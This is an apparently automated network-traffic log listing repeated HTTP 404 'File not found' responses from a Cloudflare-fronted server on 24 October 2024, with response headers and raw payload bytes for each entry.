                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ghrbr8HWaKyEIcbXbZ0uuqzCCBoVaPglJKiA339dHduFOIL1TwMzH9uHLEhdtv8%2BAJFKQF%2FhGXorIJyWH7T3YRHqZRb2ZiUn15AVXpflCNZyC8M0zoyuC9obZXehQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad97c2e8e4763-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1786&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62HvQa5B1PVtYXp7fNbHdRfunOPboMmWhs%2Bo8HJKl4qKlx5vp6E5gnBlKERZ7hU%2BNUm4YLqaC2YabOPWWZLNGGRN9JUBmqaTRUXE2sB8Bnv7s9SFIzwyC7kuPzILag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad98a09c7461e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCtyULF3a9teyp%2FLzBS1NMYgl4ta5cmf14y7Dk989Y7UaACxYkUxtujmgeJVNyckk25svdwRLRtUBXMI%2B3iNGA7GxHcR0ky9ci5KmQcYX1oqL8kw%2F31l4xs0Dk6MWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9906b014870-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wrmhXT%2FQhM99QDk7xPAxCe6xCbPwLs2OpBShj7lWk5VqdF3z4ZxqzK%2FawZtf1fg4UVkiCm6flA8%2B2hM3WJZ%2FymEZxV2TfZiol4jZzrf4AWFYwBaz51MNRjp7c44gA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad997fcc0e76e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UHUBncF3y283oCNqH1YGxN8eesV3mfiV2vyWI%2BgMmbFT0KJD%2FzZ08L3lMI1YIPKFfkCXo52fb96htnCG8KG1z3vTNO9PZWwT0bb4jjf58%2BvurtiTzrWYOn6dEz2JNw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9ac6f836c19-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrcHAnxqQ5NLlGG7dBsoh3LtMe3srdBvsIEoWOawnJKWTzeTz%2Fj%2Fdr6Ykr%2Fc46CKbZPtJXY1zCjroZ01XBN27t7j%2FuiH%2FRhYNaJAmLBSycM5SnjgV2lYjhfSqh9Cbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9bca9f82cd5-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2269&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsCeeoYNBLF9gQhR1iawkzcwxvxkKE07wgJiABNyzWBopfub38hYcQS%2Bm%2BmVRyYF4skuIH1U84tJ7vFEpeporZjtwmiOzgyJ7CupqV7aEu8Y%2FL5rdtD8T9i603uJxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9d96ba74672-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZoUv%2BPPJd0tVciBSgbcPpIv5el0L6VJEeaH2uI8f9bZP7FL8JtHi%2F44nIBMvebOBfZZzFWtZNDRQOTKrCEfc1RqVcsQhg6obYszclMjrrXLVEqTszQA3aETSEf3mmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9e0eb796b6a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1No8y1topIo6w43ZP%2B8Oy%2BYX%2FEsKUWLRZb19VBQnuBsLXc0CDobIBC8dWJHtjHU5eV6TwTSnKdmfsUEo%2FK3bNHQjCOjdzbQpzRM8EOfOuOfvQDurqfwjgFZfhw%2BLbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9e7cb453abe-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky3uBCX0Z19WlgeL7AA8Tw7OtrsrpN%2FCY13aQSYHqIKMRuoDOk4KGIQMP65p0bgVmq5ztY50CKny5YTEoiBpSTk5QRI7gvpnBsQiOVo6sE93BG9fdEGhpEI679oVOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9eecb3f6b43-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdhL7acaJ6ijpM%2Fz8d%2B1fZ20YOUDVzIFzvJQH71sOKoW3Uk6vy8FTa9RK26A4z8nv0fPEUY1DCibtBVpMnXCyHDWtTtunHTk%2FN7KtmeDDGtmNb7yPDgrlMwrUqRa9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9fe1d9c2e63-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5r9M1Kxwmp06Tn%2BSlDd2Owuu0bUHoU8k%2FRiz5ZhtRpRS3JjPHDsUjdqsHu3%2B3E%2BKBIgHJdGzmxVVo7xwd4pPU1uVogjD9T9wa96I97M3URqo7YJ%2FqoIEG5aqHd8ePg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada04ae798788-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hoy8jUtbaNiQogpR7xBYRN4Qxa0WEHg5pB%2Fbg287JQIreEDqJcCElSurkRf0GV3uAseD2m12UdSjD4uWZN43a97I5f1tjz6YVgAxpNsMZVTU7JbisG3dKGWBefZLQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada0b5dd94743-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1120&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=105&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEeWlldJIgJjnVVY0SO26O0TfTmIXckdTrnihdrTBRhuzX5FS4qGcQrLHtrnWqxzo0rzHSNE3%2F24hFuvhLTQGBuuvuXzp5VQBLrVITaxiFBjYN%2B9fsZdePlJbC6d2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada12ba766b82-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRL0MJ6O1BAFldDScCQCjuc4Np8QFdXGb3rHH6ZGn6EI1HL80Gs5DaDyzC7U2AIQ4EMmyTO%2FIqK92ZxRKrE4ZGRUtAzH4XQq6Vc5xutaG59hKXXjKswA42SkvjP0LQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada1c19a06c62-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWYQ2w75zgZFo8QaD7WFRpSfrTPXYBuKFIZxHQ5C6gWjGcRe%2FKXfB9LzwVy3hqLZJk8iMsoMUCWYZZhDVRYvHMc7LlKFBh17eYmTvwXK%2B61HMX%2BlbQ8CwXipME7JoA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada2dedc56b39-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1%2B1Q%2Fo%2FG2QnAoJlSM0yAKKU6G3R2R5pGONJQGTP%2FyDAo0sqh5tYQl1FFInBNBi7QAjr599mfV9tHRf1Q1QTjRACFrNOTf85kNB5ENQ6cw2N4bDrZqiZ1%2FGzjSKOzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada44194f35a2-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoJF9AMe%2FA%2B%2BSad6%2B3CyNVUbHH0zURWAvWe39GrkE4FOmChe%2FbYIAfXfH7nlf1cIWHiZiVRtoP8EbFR2zcvjEr%2F%2BRDhDqSraZ3%2F33cl7pmmo2sSZsWO37rvzbcxfow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada4a8fd24868-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1398&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74i3Eu8mrHpb3GPYKmVboas8SY9SUF9ej8%2BmMq1nH8G%2F9I6WLwstdvVHF4LGniTh0f2WfWV70WksH5ZOs2eQ%2FjOCgKdbluf3hEasg2worBmZgOkqPPitMHBQlhltMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada513b2ea927-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1540&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHkhOwqkAR225TjaaK3%2B5VGRcaldiYXKReieWHLBJGHDB5iu%2BVjX%2FeKTdR4v3fvD68rqTWpBeQJmhv6ACfFHSCvXQ%2B5ENF5abqaEPBDLM6z9K1Ru5e1wanLVRITgQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada58ccaee857-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjdKh59KaDKOs3aZ5Gi7oN9PsKZ1g9DB23k5SQBKGa288O5VBEyDksfYOwl5pfk%2BQqH8iv%2BQtkd6ZSj%2BZAD04pM873rGSjdktUen6N%2FvsMaXlwTdySB7FLcRlL%2Fssw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada60493a6b48-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2601&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URi8w8bwwL4koeUv%2FYGuYMoE7NlwBOsfD5HUCry5zBLpeTMEAKVcR8KZabIw1Cl0dUfRj4Zg%2Fz%2B0B9uTn9eHGVT66fLcK8NkORlhi3tQiZSpWZ8x0V8RChRpeV18Qg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada671d0b2fdc-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZAKx2Yw68A5Tn2NQ8gDz%2Basu58%2BVjpuZCY%2BUfRvrZ6FR9lryFYhk39R4K4Cw%2BXnaEkQUA7Ba5u4yBJjk0e5nvnHPdV1FlcWzxP6HL8%2F10HWLt72l%2FAs17MFfFmpPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada6dab6e6b5b-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1882&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbomeqce6xggmjjX5oK1szsV7VWp%2FZH%2BxF81mAqghIp8ZTsvxy3cz0XKfqgqe68syYxqKu%2BRCKnWAVx3mzmefB8tadmD9V%2FHkS7N6TcLnhYV6as1gphbiukbS5PG6w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada7618dc465c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pEKBl8uyv2kO%2FbYI7NA7EdUYBqSfE7akentiVlZFbLsptxDfBEB%2FAAVmwQmk3r2QQd0IYJKiuhD401huKJ9RwIZcAftuMrnWdneAE7Kl%2B%2FNq7yjxbwIvWXHqTtscrw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada7d3bca3ac4-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEQo5emQw2osqdRyOMFO0Hdr%2Fx46iNWx6ruwmf%2FcWoBoGOXHQyaanl2vzOuhIyncfAmFvI5cOanErPFoHvNhwNh62Ar6KyjkcfRJvfvx4Oysm4nzrGPfPdoJvSqBLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada8a6a234757-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1238&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
